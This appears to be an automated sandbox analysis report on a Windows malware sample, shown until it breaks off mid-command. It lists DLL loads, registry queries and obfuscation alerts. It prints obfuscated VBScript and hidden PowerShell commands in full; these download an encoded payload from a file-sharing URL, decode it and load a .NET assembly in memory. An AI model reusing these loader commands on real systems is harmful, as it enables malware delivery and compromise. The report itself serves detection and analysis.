                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Binary string: _.pdb source: OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  VBScript performs obfuscated calls to suspicious functions
                  Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell") shelll.Run chambrana, 0, False WScript.Quit(ERR_GENERAL_FAILURE)NPakelvWqGxKgNU = "iLrqLLZhKJZhWKK"aZQJzULepzicsLf = "bCIcGhfCiqZLfzx"CKKnLqffZnoWKpL = "AJpNpLgGoueLIfL"ienboAmdnWgRNuZ = "acWbdcUceOkhChk"iBljcSeLoKWAqPf = "erhRqRLKWcnkCdh"heAoBiPLPLPGiLi = "IqWkGLmkiWUioUj"CGzWpkuJqOPpLOK = "hALArLABbULqdcW"KdLzxObTBaskeLG = "UWULNheAkWaWtJi"GZqzfSiShmWZpWq = "tGkkWGiLKWTozNL"rLLLNGgGGefcLoK = "kxAcmTBOHdKORah"OikPALkKmLekohc = "mgcmUWHpzbZpWbl"pRRWAQzLcxxozGb = "LAoCjKLhZxUZzLL"tkWczjLLWRWBLKL = "CgUxkKziLeZNcth"eodfeZWCWWWWdqd = "ZBIWbOclqWLecLU"CGdBhqoGsIWnotL = "ABlirUhiLSkciWR"ddUhIKobTdsoiGK = "KWLubjnHeAJpZLp"GcPWWWtuRBCmKle = "aPbLcpbSutUiLfe"LKUpGWWiLGiiiil = "zBfuAkokZsipaZW"APKWWLzlUcicKNi = "ibHhmGaQLLLWLLb"WcPmLNRznLeOkNA = "giIAWWtKLGLhWzi"zxbdePLaczfkiTL = "pKLiWcfbWmGZWAr"KRLnZpcLxbOWWnC = "NAKpuKKiLzRPKqZ"WNiBHUgtLqcpzfz = "iozZnZPAmmGNaiZ"QuhKSkGWJhLoWzW = "aKildibLfLZipuk"vzhxsiGClboLQuZ = "iGOKCmWWnttztAd"LcfLaPazlWLOSfm = "LWUUGIiLafKstWI"GWSUbLaPGpLHLbf = "QALAQKPcAlLbZpg"AcLbaUbuaAzWGKi = "qQqKWLPpGfrpefa"AHWWeuZljCLUiOo = "UIIPGcaLjzKappt"kuzezLUmZeLceJA = "NiidWolUfiskzKL"xUtUJaiGbhKJNck = "tWULcvZvSRLaiNc"lmAIKGczpLWdPba = "cPvWAKiHGAgznLa"LZGzLadcpizABOL = "nkNrxcCWnzRLkjb"OLkdrkzdLfakUSU = "WIkHKGNzdUkoKOz"WZcBAWkqWpcjpfi = "eUAmNKorBPLNpUK"hWqTbGWoPLKAKog = "KkiTppNGAuRNWcL"UdbxLKWeBOWnaiU = "GiWLCeGWjGipLkA"qUAJzdLApLpaaKW = "OeQqzipiIuWClLL"mcmLJKeopmsjfGd = "gLiGeaLLHCuhzoP"AmaKkoGLAiONiLP = "UeiPLhAijLoCxnN"cPcoLtZObPLLWNo = "zhpShvKUciiRLUN"WfASIhigsozmpOk = "AKttrLLcGcKhAuK"kLcUAkmiWCeBGLP = "xGmqLOChLGcdCZW"GUmacGWuxcWGcPe = "zWpOBknPtakzbJd"mPKWLWbiiutGPZL = "UkWURvWZcuOpIke"dAzGUAoBBfhkcWG = "GdbomNeGGpivgbv"RaceIOAavcPetmL = "NlikJWllcLHuAGi"lazNNatKWAhpCfG = "LaCGJWoGLpSPUqb"UWmKLGkkoxGqWUq = "fjLdRGcLpqpjGco"qcBemtGpcLbiaKe = "KKlAfZHAmLRegIp"ioUQAUAcRKdLxiN = "ZUdKxWtBaHLzGWi"GLLLeGmLrKTkeLW = "xRAqUQWkGLcHgWN"kzZnWkRLcCgKILK = "BLChpLmZiLicpLZ"igIAiLKBqKBGLjg = "WOThSLCiixdxoUU"UHqHJZIbBqICJLB = "pvLfWpCphociiLi"GCumGPtWjnpRqGP = "KSoWmkLsNbZLGkG"hUhBzejBmcPPRtU = "qazQgGPNicWgCUW"fUKBvvpKaKsfLzf = "rLoWzeGjrhhxcAL"LTWbNmKIcipWCWz = "jmLudLWWGGWiCpp"ztlPhpLKmGALKlf = "qzWxSpxPIoiBpGp"lmcqmdKPmGKAieW = "kZKAixKcouZUUBG"bJKLjQkALNsUkKL = "ILUdWxLenzKfsCP"eWdfiRGkBjGLmWG = "pUNidKAIACSLeim"lLafCuWRsiKLjct = "lZIulLpLLWzGUkH"CikcLjkWGWaGqWZ = "mLCKcPqNLiLKbNz"PnTLHCoZgAZBuvp = "PvkpPOoLUsCbaLL"CciJJnLPKLOUKWp = "izxKNWiiKqpWGbg"azZLWIKWfeiWzGN = "nqNLRPQemBOOoit"LRzLcRfLiANUnAf = "scqWnidLUighmfZ"xPqzccZHWKWtiWb = "LikUZLQtppPGNkZ"eWphLChbCWacGCl = "RGkOsWBOiUmfohW"GZioiPhObBiLfff = "AiOKLQaoLZcRcmt"LaLtHcGrhBxrfbB = "nUiNGQmLkUehWzK"zLPCalUWclztqWp = "KWzZNtkkfUhILmg"hdKSzomRSAWAKeb = "WoKiUqfiOiWpiWb"odOKLWbdmLWPLpt = "PUKLniLoKULmLZK"UkWucZvzLHLhBtx = "IbSgJKGUUTLeCPO"jqitNesOZKapNiW = "zjeUWCZieUexKrS"qPiecbkZiLcRAcU = "WTWqdCfKGfLONeq"cnuNkGdzfghNGbx = "GkLHgCfWLbeuagK"OibKKJfmnckqvNz = "LoqPGpeKiLpWGhK"oKQRxUZohWNSKkp = "AWeCLWoGujCtnWL"LAWANGAdiJKoiLd = "PuAKZLdLLqbBotf"hZKTeZUeL
                  Found suspicious powershell code related to unpacking or dynamic code loading
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'LiAoIChbc3RySW5nXSR2RXJCb1NlUHJlZkVyZU5DRSlbMSwzXSsnWCctSm9pbicnKSggKCgnRUlIaW1hZ2VVcmwnKycgPSB6TnFodHRwczovLzMxMDUuZmlsZW1haWwuY29tLycrJ2FwaS9maWxlL2dldD9maWxla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lJysnMDEwOTYzOGM5YmZiOTU3MTcnKyczMjUzMTMwOWI1ZmY3YyB6TnE7RUlId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtFSUhpbWFnZUJ5dGVzID0gRUlId2ViQ2xpZW50LkRvd25sb2FkRGF0YShFSUhpbWFnZVVybCk7RUlIaW1hZ2VUZXgnKyd0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoRUlIaScrJ21hZ2VCeXRlcyk7RUlIc3RhcnRGbGFnID0gek5xPDxCQVNFNjRfU1RBUlQnKyc+PnpOcTtFSUgnKydlbmRGbGFnID0gek5xPDxCQVNFNjRfRU5EPj56TnE7RUlIc3QnKydhcnQnKydJbmRleCA9IEVJSGltYWdlVGV4dC5JbmRleE9mJysnKEVJSHN0YXJ0RmxhZyk7RUlIZW4nKydkSW5kZXggPSBFSUhpbWFnZVRleHQuSW5kZScrJ3hPJysnZihFSUhlbicrJ2RGbGFnKTtFSUhzdGFydEluZGV4IC1nZSAwIC1hbmQgRUlIZW5kSW5kZXggLWd0IEVJSHN0YXJ0SW5kZXg7RUlIc3RhcnRJbmRleCArPSBFSUhzdGFydEZsYWcuTGVuZ3RoO0VJSGJhc2U2NExlbmd0aCA9IEVJSGVuZEluZGV4IC0gRUlIc3RhcnRJbmRleDtFSUhiYXNlNjRDb20nKydtYW5kID0gRUlIaW1hZ2VUZXh0LlN1YnN0cmluZygnKydFSUhzdGFydEluZGV4LCBFSUhiYXNlJysnNjRMZW5ndGgpO0VJSGJhc2U2NFJldmVyc2VkID0gJysnLWpvaW4gKEVJSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBPVEYgRm9yRWFjaC1PYmplY3QgeyBFSUhfIH0pWy0xLi4tJysnKEVJSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07RScrJ0lIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhFSUgnKydiYXNlJysnNjRSZXZlcnNlZCk7RUlIbG9hZGVkQXNzZW1ibHkgPSBbUycrJ3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEVJSGNvbW1hbmQnKydCeXRlcyk7RUlIdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh6TnFWQUl6TnEpO0VJSHZhaU1ldGhvZC5JbnZva2UoRUlIbnVsbCwgQCh6TnF0eHQucnNlZy95ZicrJ2cnKycvdWUucmVsbG9ydycrJ3Noc3VwLnYnKydicy8vOnAnKyd0dGgnKyd6TnEsIHpOcWRlc2F0JysnaXZhZG96TnEsIHpOcWRlc2EnKyd0aXZhZG96JysnTnEsIHpOJysncWRlc2F0aXZhZG96TnEsJysnIHpOcWRlc2F0aXZhZG96TnEsIHpOcTEnKyd6TnEsIHpOcU9uZURyaXZlU2V0dXB6TnEsIHpOcWRlc2F0aXZhZG96TnEsIHpOcWRlc2F0aXZhZG96TnEsek5xZGVzYXRpdmFkb3pOcSx6TnFkJysnZXNhdGl2YWRvek5xLHpOcWRlc2F0aXZhJysnZG96TnEsek5xMXpOcSx6TnFkZXMnKydhdCcrJ2l2YWRvek5xKSk7JykgIC1DUkVQbGFjZSd6TnEnLFtDaEFSXTM5IC1yZXBsQWNlIChbQ2hBUl02OStbQ2hBUl03MytbQ2hBUl03MiksW0NoQVJdMzYtcmVwbEFjZSAoW0NoQVJdNzkrW0NoQVJdODQrW0NoQVJdNzApLFtDaEFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                  Obfuscated command line found
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloadedAssembly = [S'+'ystem.Reflection.Assembly]::Load(EIHcommand'+'Bytes);EIHvaiMethod = [dnlib.IO.Home].GetMethod(zNqVAIzNq);EIHvaiMethod.Invoke(EIHnull, @(zNqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'zNq, zNqdesat'+'ivadozNq, zNqdesa'+'tivadoz'+'Nq, zN'+'qdesativadozNq,'+' zNqdesativadozNq, zNq1'+'zNq, zNqOneDriveSetupzNq, zNqdesativadozNq, zNqdesativadozNq,zNqdesativadozNq,zNqd'+'esativadozNq,zNqdesativa'+'dozNq,zNq1zNq,zNqdes'+'at'+'ivadozNq));') -CREPlace'zNq',[ChAR]39 -replAce ([ChAR]69+[ChAR]73+[ChAR]72),[ChAR]36-replAce ([ChAR]79+[ChAR]84+[ChAR]70),[ChAR]124))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloadedAssembly = [S'+'ystem.Reflection.Assembly]::Load(EIHcommand'+'Bytes);EIHvaiMethod = [dnlib.IO.Home].GetMethod(zNqVAIzNq);EIHvaiMethod.Invoke(EIHnull, @(zNqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'zNq, zNqdesat'+'ivadozNq, zNqdesa'+'tivadoz'+'Nq, zN'+'qdesativadozNq,'+' zNqdesativadozNq, zNq1'+'zNq, zNqOneDriveSetupzNq, zNqdesativadozNq, zNqdesativadozNq,zNqdesativadozNq,zNqd'+'esativadozNq,zNqdesativa'+'dozNq,zNq1zNq,zNqdes'+'at'+'ivadozNq));') -CREPlace'zNq',[ChAR]39 -replAce ([ChAR]69+[ChAR]73+[ChAR]72),[ChAR]36-replAce ([ChAR]79+[ChAR]84+[ChAR]70),[ChAR]124))"Jump to behavior
                  Suspicious powershell command line found
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbc3RySW5nXSR2RXJCb1NlUHJlZkVyZU5DRSlbMSwzXSsnWCctSm9pbicnKSggKCgnRUlIaW1hZ2VVcmwnKycgPSB6TnFodHRwczovLzMxMDUuZmlsZW1haWwuY29tLycrJ2FwaS9maWxlL2dldD9maWxla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lJysnMDEwOTYzOGM5YmZiOTU3MTcnKyczMjUzMTMwOWI1ZmY3YyB6TnE7RUlId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtFSUhpbWFnZUJ5dGVzID0gRUlId2ViQ2xpZW50LkRvd25sb2FkRGF0YShFSUhpbWFnZVVybCk7RUlIaW1hZ2VUZXgnKyd0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoRUlIaScrJ21hZ2VCeXRlcyk7RUlIc3RhcnRGbGFnID0gek5xPDxCQVNFNjRfU1RBUlQnKyc+PnpOcTtFSUgnKydlbmRGbGFnID0gek5xPDxCQVNFNjRfRU5EPj56TnE7RUlIc3QnKydhcnQnKydJbmRleCA9IEVJSGltYWdlVGV4dC5JbmRleE9mJysnKEVJSHN0YXJ0RmxhZyk7RUlIZW4nKydkSW5kZXggPSBFSUhpbWFnZVRleHQuSW5kZScrJ3hPJysnZihFSUhlbicrJ2RGbGFnKTtFSUhzdGFydEluZGV4IC1nZSAwIC1hbmQgRUlIZW5kSW5kZXggLWd0IEVJSHN0YXJ0SW5kZXg7RUlIc3RhcnRJbmRleCArPSBFSUhzdGFydEZsYWcuTGVuZ3RoO0VJSGJhc2U2NExlbmd0aCA9IEVJSGVuZEluZGV4IC0gRUlIc3RhcnRJbmRleDtFSUhiYXNlNjRDb20nKydtYW5kID0gRUlIaW1hZ2VUZXh0LlN1YnN0cmluZygnKydFSUhzdGFydEluZGV4LCBFSUhiYXNlJysnNjRMZW5ndGgpO0VJSGJhc2U2NFJldmVyc2VkID0gJysnLWpvaW4gKEVJSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBPVEYgRm9yRWFjaC1PYmplY3QgeyBFSUhfIH0pWy0xLi4tJysnKEVJSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07RScrJ0lIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhFSUgnKydiYXNlJysnNjRSZXZlcnNlZCk7RUlIbG9hZGVkQXNzZW1ibHkgPSBbUycrJ3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEVJSGNvbW1hbmQnKydCeXRlcyk7RUlIdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh6TnFWQUl6TnEpO0VJSHZhaU1ldGhvZC5JbnZva2UoRUlIbnVsbCwgQCh6TnF0eHQucnNlZy95ZicrJ2cnKycvdWUucmVsbG9ydycrJ3Noc3VwLnYnKydicy8vOnAnKyd0dGgnKyd6TnEsIHpOcWRlc2F0JysnaXZhZG96TnEsIHpOcWRlc2EnKyd0aXZhZG96JysnTnEsIHpOJysncWRlc2F0aXZhZG96TnEsJysnIHpOcWRlc2F0aXZhZG96TnEsIHpOcTEnKyd6TnEsIHpOcU9uZURyaXZlU2V0dXB6TnEsIHpOcWRlc2F0aXZhZG96TnEsIHpOcWRlc2F0aXZhZG96TnEsek5xZGVzYXRpdmFkb3pOcSx6TnFkJysnZXNhdGl2YWRvek5xLHpOcWRlc2F0aXZhJysnZG96TnEsek5xMXpOcSx6TnFkZXMnKydhdCcrJ2l2YWRvek5xKSk7JykgIC1DUkVQbGFjZSd6TnEnLFtDaEFSXTM5IC1yZXBsQWNlIChbQ2hBUl02OStbQ2hBUl03MytbQ2hBUl03MiksW0NoQVJdMzYtcmVwbEFjZSAoW0NoQVJdNzkrW0NoQVJdODQrW0NoQVJdNzApLFtDaEFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloadedAssembly = [S'+'ystem.Reflection.Assembly]::Load(EIHcommand'+'Bytes);EIHvaiMethod = [dnlib.IO.Home].GetMethod(zNqVAIzNq);EIHvaiMethod.Invoke(EIHnull, @(zNqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'zNq, zNqdesat'+'ivadozNq, zNqdesa'+'tivadoz'+'Nq, zN'+'qdesativadozNq,'+' zNqdesativadozNq, zNq1'+'zNq, zNqOneDriveSetupzNq, zNqdesativadozNq, zNqdesativadozNq,zNqdesativadozNq,zNqd'+'esativadozNq,zNqdesativa'+'dozNq,zNq1zNq,zNqdes'+'at'+'ivadozNq));') -CREPlace'zNq',[ChAR]39 -replAce ([ChAR]69+[ChAR]73+[ChAR]72),[ChAR]36-replAce ([ChAR]79+[ChAR]84+[ChAR]70),[ChAR]124))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbc3RySW5nXSR2RXJCb1NlUHJlZkVyZU5DRSlbMSwzXSsnWCctSm9pbicnKSggKCgnRUlIaW1hZ2VVcmwnKycgPSB6TnFodHRwczovLzMxMDUuZmlsZW1haWwuY29tLycrJ2FwaS9maWxlL2dldD9maWxla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lJysnMDEwOTYzOGM5YmZiOTU3MTcnKyczMjUzMTMwOWI1ZmY3YyB6TnE7RUlId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtFSUhpbWFnZUJ5dGVzID0gRUlId2ViQ2xpZW50LkRvd25sb2FkRGF0YShFSUhpbWFnZVVybCk7RUlIaW1hZ2VUZXgnKyd0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoRUlIaScrJ21hZ2VCeXRlcyk7RUlIc3RhcnRGbGFnID0gek5xPDxCQVNFNjRfU1RBUlQnKyc+PnpOcTtFSUgnKydlbmRGbGFnID0gek5xPDxCQVNFNjRfRU5EPj56TnE7RUlIc3QnKydhcnQnKydJbmRleCA9IEVJSGltYWdlVGV4dC5JbmRleE9mJysnKEVJSHN0YXJ0RmxhZyk7RUlIZW4nKydkSW5kZXggPSBFSUhpbWFnZVRleHQuSW5kZScrJ3hPJysnZihFSUhlbicrJ2RGbGFnKTtFSUhzdGFydEluZGV4IC1nZSAwIC1hbmQgRUlIZW5kSW5kZXggLWd0IEVJSHN0YXJ0SW5kZXg7RUlIc3RhcnRJbmRleCArPSBFSUhzdGFydEZsYWcuTGVuZ3RoO0VJSGJhc2U2NExlbmd0aCA9IEVJSGVuZEluZGV4IC0gRUlIc3RhcnRJbmRleDtFSUhiYXNlNjRDb20nKydtYW5kID0gRUlIaW1hZ2VUZXh0LlN1YnN0cmluZygnKydFSUhzdGFydEluZGV4LCBFSUhiYXNlJysnNjRMZW5ndGgpO0VJSGJhc2U2NFJldmVyc2VkID0gJysnLWpvaW4gKEVJSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBPVEYgRm9yRWFjaC1PYmplY3QgeyBFSUhfIH0pWy0xLi4tJysnKEVJSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07RScrJ0lIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhFSUgnKydiYXNlJysnNjRSZXZlcnNlZCk7RUlIbG9hZGVkQXNzZW1ibHkgPSBbUycrJ3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEVJSGNvbW1hbmQnKydCeXRlcyk7RUlIdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh6TnFWQUl6TnEpO0VJSHZhaU1ldGhvZC5JbnZva2UoRUlIbnVsbCwgQCh6TnF0eHQucnNlZy95ZicrJ2cnKycvdWUucmVsbG9ydycrJ3Noc3VwLnYnKydicy8vOnAnKyd0dGgnKyd6TnEsIHpOcWRlc2F0JysnaXZhZG96TnEsIHpOcWRlc2EnKyd0aXZhZG96JysnTnEsIHpOJysncWRlc2F0aXZhZG96TnEsJysnIHpOcWRlc2F0aXZhZG96TnEsIHpOcTEnKyd6TnEsIHpOcU9uZURyaXZlU2V0dXB6TnEsIHpOcWRlc2F0aXZhZG96TnEsIHpOcWRlc2F0aXZhZG96TnEsek5xZGVzYXRpdmFkb3pOcSx6TnFkJysnZXNhdGl2YWRvek5xLHpOcWRlc2F0aXZhJysnZG96TnEsek5xMXpOcSx6TnFkZXMnKydhdCcrJ2l2YWRvek5xKSk7JykgIC1DUkVQbGFjZSd6TnEnLFtDaEFSXTM5IC1yZXBsQWNlIChbQ2hBUl02OStbQ2hBUl03MytbQ2hBUl03MiksW0NoQVJdMzYtcmVwbEFjZSAoW0NoQVJdNzkrW0NoQVJdODQrW0NoQVJdNzApLFtDaEFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = 